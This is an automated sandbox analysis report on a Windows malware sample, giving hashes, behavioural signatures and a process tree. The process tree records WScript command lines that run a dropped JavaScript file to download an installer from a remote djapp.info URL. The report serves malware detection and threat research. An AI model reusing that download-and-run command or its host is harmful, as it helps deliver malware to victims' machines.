Analysis
-
max time kernel
153s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2022 08:48
Static task
static1
Behavioral task
behavioral1
Sample
ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
Resource
win10v2004-20220812-en
General
-
Target
ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
-
Size
184KB
-
MD5
8bbee466ddc779509f7b5d3ca53b5356
-
SHA1
f8bb919b6c655d571fb309af43e621b4ac6e63b9
-
SHA256
ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367
-
SHA512
c81fbfc36b438b145f9f80ff3ac10b10843f05ed499b8299e6443131df242c7c58795c254ed82baab0b904710c678f54b05344b5c73438e9b60d1d15908d6f11
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3B:/7BSH8zUB+nGESaaRvoB7FJNndnU
Malware Config
Signatures
-
Blocklisted process makes network request 12 IoCs
flow pid Process 4 5116 WScript.exe 8 5116 WScript.exe 22 3588 WScript.exe 24 3588 WScript.exe 34 3588 WScript.exe 39 3588 WScript.exe 42 3588 WScript.exe 47 3588 WScript.exe 48 3164 WScript.exe 49 3164 WScript.exe 51 1036 WScript.exe 56 1036 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 48 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4992 wrote to memory of 5116 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 80 PID 4992 wrote to memory of 5116 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 80 PID 4992 wrote to memory of 5116 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 80 PID 4992 wrote to memory of 3588 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 82 PID 4992 wrote to memory of 3588 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 82 PID 4992 wrote to memory of 3588 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 82 PID 4992 wrote to memory of 3164 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 83 PID 4992 wrote to memory of 3164 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 83 PID 4992 wrote to memory of 3164 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 83 PID 4992 wrote to memory of 1036 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 84 PID 4992 wrote to memory of 1036 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 84 PID 4992 wrote to memory of 1036 4992 ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe"C:\Users\Admin\AppData\Local\Temp\ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe2⤵
- Blocklisted process makes network request
PID:5116
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe2⤵
- Blocklisted process makes network request
PID:3588
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe2⤵
- Blocklisted process makes network request
PID:3164
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe2⤵
- Blocklisted process makes network request
PID:1036
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76